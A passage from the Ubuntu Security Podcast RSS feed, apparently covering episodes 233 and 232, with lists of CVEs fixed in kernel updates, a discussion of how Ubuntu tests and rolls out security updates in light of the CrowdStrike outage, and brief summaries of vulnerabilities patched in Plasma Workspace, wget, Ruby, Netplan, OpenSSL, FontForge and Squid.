<li><a href="https://ubuntu.com/security/CVE-2024-35854">CVE-2024-35854</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27437">CVE-2024-27437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35851">CVE-2024-35851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26654">CVE-2024-26654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26629">CVE-2024-26629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26988">CVE-2024-26988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27001">CVE-2024-27001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26956">CVE-2024-26956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35990">CVE-2024-35990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27020">CVE-2024-27020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26996">CVE-2024-26996</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35817">CVE-2024-35817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26950">CVE-2024-26950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26810">CVE-2024-26810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35893">CVE-2024-35893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35852">CVE-2024-35852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35895">CVE-2024-35895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27009">CVE-2024-27009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26687">CVE-2024-26687</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35821">CVE-2024-35821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35944">CVE-2024-35944</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27015">CVE-2024-27015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35822">CVE-2024-35822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35823">CVE-2024-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35890">CVE-2024-35890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35973">CVE-2024-35973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27013">CVE-2024-27013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35912">CVE-2024-35912</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26817">CVE-2024-26817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35935">CVE-2024-35935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26989">CVE-2024-26989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35877">CVE-2024-35877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26926">CVE-2024-26926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35849">CVE-2024-35849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26993">CVE-2024-26993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26974">CVE-2024-26974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35791">CVE-2024-35791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35910">CVE-2024-35910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36008">CVE-2024-36008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35988">CVE-2024-35988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26813">CVE-2024-26813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36006">CVE-2024-36006</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35879">CVE-2024-35879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35789">CVE-2024-35789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35969">CVE-2024-35969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35925">CVE-2024-35925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26984">CVE-2024-26984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35871">CVE-2024-35871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35853">CVE-2024-35853</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27004">CVE-2024-27004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35899">CVE-2024-35899</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26931">CVE-2024-26931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35934">CVE-2024-35934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35796">CVE-2024-35796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36020">CVE-2024-36020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52699">CVE-2023-52699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35930">CVE-2024-35930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26957">CVE-2024-26957</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35804">CVE-2024-35804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26922">CVE-2024-26922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26814">CVE-2024-26814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35900">CVE-2024-35900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27395">CVE-2024-27395</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26642">CVE-2024-26642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26960">CVE-2024-26960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26935">CVE-2024-26935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36005">CVE-2024-36005</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26981">CVE-2024-26981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26934">CVE-2024-26934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26976">CVE-2024-26976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35806">CVE-2024-35806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35915">CVE-2024-35915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35922">CVE-2024-35922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48808">CVE-2022-48808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26973">CVE-2024-26973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35933">CVE-2024-35933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35785">CVE-2024-35785</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26937">CVE-2024-26937</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35918">CVE-2024-35918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27000">CVE-2024-27000</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26977">CVE-2024-26977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27393">CVE-2024-27393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35984">CVE-2024-35984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35970">CVE-2024-35970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27019">CVE-2024-27019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26955">CVE-2024-26955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35888">CVE-2024-35888</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35976">CVE-2024-35976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35982">CVE-2024-35982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35805">CVE-2024-35805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35960">CVE-2024-35960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26812">CVE-2024-26812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27017">CVE-2024-27017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26966">CVE-2024-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52880">CVE-2023-52880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27396">CVE-2024-27396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35809">CVE-2024-35809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35997">CVE-2024-35997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26958">CVE-2024-26958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26961">CVE-2024-26961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26923">CVE-2024-26923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26811">CVE-2024-26811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35813">CVE-2024-35813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36029">CVE-2024-36029</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35896">CVE-2024-35896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26965">CVE-2024-26965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35885">CVE-2024-35885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35855">CVE-2024-35855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36007">CVE-2024-36007</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26929">CVE-2024-26929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35897">CVE-2024-35897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35905">CVE-2024-35905</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27018">CVE-2024-27018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26886">CVE-2024-26886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35884">CVE-2024-35884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52488">CVE-2023-52488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36016">CVE-2024-36016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35872">CVE-2024-35872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35819">CVE-2024-35819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35907">CVE-2024-35907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26952">CVE-2024-26952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35940">CVE-2024-35940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35989">CVE-2024-35989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27059">CVE-2024-27059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26925">CVE-2024-26925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35955">CVE-2024-35955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36004">CVE-2024-36004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26994">CVE-2024-26994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35807">CVE-2024-35807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35886">CVE-2024-35886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35978">CVE-2024-35978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35958">CVE-2024-35958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35902">CVE-2024-35902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25742">CVE-2024-25742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25739">CVE-2024-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24861">CVE-2024-24861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23307">CVE-2024-23307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38096">CVE-2022-38096</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 - GCP</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="discussion-of-testing-for-security-updates-in-light-of-crowdstrike--11-20">Discussion of testing for security updates in light of CrowdStrike (11:20)</h3>
<ul>
<li>Recent outage of over 8 million Windows machines running CrowdStrike Falcon
<ul>
<li><a href="https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/">https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/</a></li>
</ul>
</li>
<li>Initially very little information on what happened - CS have now released more
details about the apparent testing that was done but clearly were never
actually testing the combination of Windows + Falcon + Rapid Response Content
otherwise would have observed this failure immediately</li>
<li>Also clearly didn&rsquo;t have any kind of staged/phased update process in place either
<ul>
<li>If you want to read a good analysis of the response from CS,
<a href="https://verse.systems/blog/post/2024-07-25-parsing-crowdstrikes-post/">https://verse.systems/blog/post/2024-07-25-parsing-crowdstrikes-post/</a>
<ul>
<li>Toby Murray (full disclosure, my brother) - Associate Professor and
Co-Lead of Computer Science Research Group at School of Computing and
Information Systems, University of Melbourne, Director, Defence Science
Institute (Vic &amp; Tas)</li>
</ul>
</li>
<li>Future plans from CS now include gradual deployment of rules with &ldquo;canaries&rdquo; etc and then increased testing:
<ul>
<li>Local dev testing, content update testing, stress, fuzz, fault-injection,
stability and interface testing</li>
<li>Toby (not surprisingly as an expert in formal software verification)
advocates for a formal approach to validating rules and in-kernel code etc</li>
</ul>
</li>
</ul>
</li>
<li>What can we learn from this for Ubuntu?
<ul>
<li>Formal methods might be tractable for a large company like CS who is
developing a single, specific product like Falcon (particularly if they can
reduce the size of their kernel module), this is not the case for a Linux
distribution like Ubuntu which collates over 30,000 different open source
software projects
<ul>
<li>over 4TB of source code across the various releases</li>
</ul>
</li>
</ul>
</li>
<li>Instead have to take the pragmatic approach of thorough testing
<ul>
<li>For regular SRUs - detailed review by SRU team including a thorough test
plan, cross-package testing via <a href="https://autopkgtest.ubuntu.com/">Autopkgtest</a> plus a minimum 7 day &ldquo;soak&rdquo;
testing in the proposed pocket of the release before being pushed into the
-updates pocket</li>
<li>Once in -updates, <a href="https://ubuntu.com/server/docs/about-apt-upgrade-and-phased-updates">Phased Updates</a> implements the gradual deployment model -
you can check the progress of various updates at
<a href="https://ubuntu-archive-team.ubuntu.com/phased-updates.html">https://ubuntu-archive-team.ubuntu.com/phased-updates.html</a>
<ul>
<li>Watches for increased error reports via errors.ubuntu.com (captured via
apport/whoopsie) and if detected stops the release of the package to users</li>
</ul>
</li>
</ul>
</li>
<li>Compare that to the process for Security updates
<ul>
<li>Separate -security pocket in the archive which packages get published to
immediately
<ul>
<li>No standardised review by separate team
<ul>
<li>instead adhoc reviews within the security team</li>
</ul>
</li>
<li>No documented test plan per update
<ul>
<li>instead <a href="https://git.launchpad.net/qa-regression-testing/tree/README.testing">thorough test procedures</a> including:
<ul>
<li>checking for any changes in the build log (e.g. new compiler
warnings/errors) and comparing the difference between the generated
binaries (e.g. new / changed / missing symbols - ABI breaks)</li>
<li>testing of the patched code including stepping through it with a
debugger</li>
<li>running any existing PoC or creating one if none exists and is
feasible</li>
<li>running any existing unit/integration tests within the package
(including dep8/autopkgtests)</li>
<li>test apt upgrade of the package is smooth</li>
<li>QA regression testing scripts - maintained by the security team,
implement various regression tests and system-level tests for
different packages to exercise them in various different
configurations</li>
</ul>
</li>
</ul>
</li>
<li>Cross-package testing via <a href="https://people.canonical.com/~platform/security-britney/">security-britney</a> - instance of the autopkgtest
infrastructure that runs against the public <a href="https://launchpad.net/~ubuntu-security-proposed/+archive/ubuntu/ppa/">Ubuntu Security Proposed PPA</a>
(and we have a similar internal instance for the different private PPAs we
use for embargoed updates or ESM etc)</li>
<li>No phased updates - instead immediate updates via specific
security.ubuntu.com archive, combined with unattended-upgrades
<ul>
<li>designed to deliver security updates as soon as possible to remediate
issues</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>In general, I would argue that the process we have in place results in more
thorough testing for security updates - particularly checking for anything
anomalous like new compiler warnings / symbols / unexpected changes in
binaries etc as well as more thorough, standardised testing for packages
through the <a href="https://git.launchpad.net/qa-regression-testing/">QA Regression Testing</a> repo scripts</li>
<li>However, the lack of phased/progressive updates combined with the separate
security.ubuntu.com archive and unattended-upgrades on by default, means any
security update is delivered to Ubuntu users within 24 hours (on average) -
BUT then any regression is also rolled out to all users in 24 hours as well</li>
<li>As such, kicking off discussions around possible changes to our deployment
strategy to potentially introduce some more guard rails on the deployment side</li>
<li>If you have any thoughts, please let us know</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E233.mp3" length="22580692" type="audio/mpeg" /><itunes:duration>1447</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 232
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-232/</link>
          <pubDate>Fri, 05 Jul 2024 19:18:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>ded2de69c2c064527178ead61f80eff15ccd66c97cffdee43302e9bb772319cc53c347cd2f57af087c607f7cd54b73ada44f576dd2f2be2ab7c5735869c9631f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 232</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we deep-dive into one of the best vulnerabilities we've seen in a long
  time _regreSSHion_ - an unauthenticated, remote, root code-execution vulnerability
  in OpenSSH. Plus we cover updates for Plasma Workspace, Ruby, Netplan,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we deep-dive into one of the best vulnerabilities we've seen in a long
  time _regreSSHion_ - an unauthenticated, remote, root code-execution vulnerability
  in OpenSSH. Plus we cover updates for Plasma Workspace, Ruby, Netplan,
  FontForge, OpenVPN and a whole lot more.
  </itunes:summary>
        <description>  This week we deep-dive into one of the best vulnerabilities we've seen in a long
  time _regreSSHion_ - an unauthenticated, remote, root code-execution vulnerability
  in OpenSSH. Plus we cover updates for Plasma Workspace, Ruby, Netplan,
  FontForge, OpenVPN and a whole lot more.
  </description>
        <googleplay:description>  This week we deep-dive into one of the best vulnerabilities we've seen in a long
  time _regreSSHion_ - an unauthenticated, remote, root code-execution vulnerability
  in OpenSSH. Plus we cover updates for Plasma Workspace, Ruby, Netplan,
  FontForge, OpenVPN and a whole lot more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we deep-dive into one of the best vulnerabilities we&rsquo;ve seen in a long
time <em>regreSSHion</em> - an unauthenticated, remote, root code-execution vulnerability
in OpenSSH. Plus we cover updates for Plasma Workspace, Ruby, Netplan,
FontForge, OpenVPN and a whole lot more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>39 unique CVEs addressed</p>
<h3 id="usn-6843-1-plasma-workspace-vulnerability--01-23">[<a href="https://ubuntu.com/security/notices/USN-6843-1">USN-6843-1</a>] Plasma Workspace vulnerability (01:23)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-36041">CVE-2024-36041</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>KDE Session Manager - used for restoring previously running applications at next boot</li>
<li>Provides ability to clients to connect to it via Inter-Client Exchange (ICE)
protocol - protocol within X for allowing X clients to interact with
one-another</li>
<li>Since X supports remote clients, is important to authenticate connections - in
this case KDE SM would authenticate to ensure the connection was coming from
the local machine - but this could then allow any local user to connect to
another users SM and hence use the session management features to set some
arbitrary application to be run when the session is restored - as that other
user</li>
</ul>
<h3 id="usn-6852-1-usn-6852-2-wget-vulnerability--02-42">[<a href="https://ubuntu.com/security/notices/USN-6852-1">USN-6852-1</a>, <a href="https://ubuntu.com/security/notices/USN-6852-2">USN-6852-2</a>] Wget vulnerability (02:42)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-38428">CVE-2024-38428</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>mishandled semicolons in userinfo of a URL - this is the <code>user@host:port</code>
combination - so would possibly then use a different hostname than the one the
user expected</li>
</ul>
<h3 id="usn-6853-1-ruby-vulnerability--03-12">[<a href="https://ubuntu.com/security/notices/USN-6853-1">USN-6853-1</a>] Ruby vulnerability (03:12)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-27280">CVE-2024-27280</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Provides methods <code>ungetbyte()/ungetc()</code> to push-back characters on an IO
stream - would possibly read beyond the end of the buffer - OOB read</li>
</ul>
<h3 id="usn-6851-1-netplan-vulnerabilities--03-37">[<a href="https://ubuntu.com/security/notices/USN-6851-1">USN-6851-1</a>] Netplan vulnerabilities (03:37)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4968">CVE-2022-4968</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two different issues
<ul>
<li>When configuring a Wireguard interface, would write the wireguard private
key into the netplan interface configuration - but would then leave this
with world-readable permissions</li>
<li>This can either be specified as the filename to the private key OR the
private key itself - so if had chosen to specify the actual private key,
this is now world-readable to any other user
<ul>
<li>Fixed to use restrictive permissions on the generated configuration files
and to fixup any existing ones as well</li>
</ul>
</li>
<li>Failed to escape control characters in various backend files - a malicious
application that is able to create a netplan configuration could then abuse
this to get code execution as netplan</li>
</ul>
</li>
</ul>
<h3 id="usn-6851-2-netplan-regression">[<a href="https://ubuntu.com/security/notices/USN-6851-2">USN-6851-2</a>] Netplan regression</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)</li>
<li>Failed to properly do the permissions fixup on already existing files</li>
</ul>
<h3 id="usn-6854-1-openssl-vulnerability--05-10">[<a href="https://ubuntu.com/security/notices/USN-6854-1">USN-6854-1</a>] OpenSSL vulnerability (05:10)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40735">CVE-2022-40735</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Related to a historical vulnerability - <a href="https://dheatattack.gitlab.io/">https://dheatattack.gitlab.io/</a> - CVE-2002-20001</li>
<li>DoS against Diffie-Hellman key exchange protocol - during key negotiation a
client can trigger expensive CPU calculations -&gt; CPU-based DoS</li>
</ul>
<h3 id="usn-6856-1-fontforge-vulnerabilities--05-50">[<a href="https://ubuntu.com/security/notices/USN-6856-1">USN-6856-1</a>] FontForge vulnerabilities (05:50)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25082">CVE-2024-25082</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25081">CVE-2024-25081</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Uses various external utilities to do things like decompress archive files etc</li>
<li>However, would do this via the <code>system()</code> system-call - which spawns a shell -
so if a filename contained any shell metacharacters, could then just easily
get arbitrary code execution</li>
<li>Changed to use the utility functions from glib that do not spawn a shell and
instead just exec() the expected command directly</li>
</ul>
<h3 id="usn-6857-1-squid-vulnerabilities--06-48">[<a href="https://ubuntu.com/security/notices/USN-6857-1">USN-6857-1</a>] Squid vulnerabilities (06:48)</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25617">CVE-2024-25617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50269">CVE-2023-50269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49286">CVE-2023-49286</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49285">CVE-2023-49285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41318">CVE-2022-41318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28651">CVE-2021-28651</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6566-2-sqlite-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6566-2">USN-6566-2</a>] SQLite vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
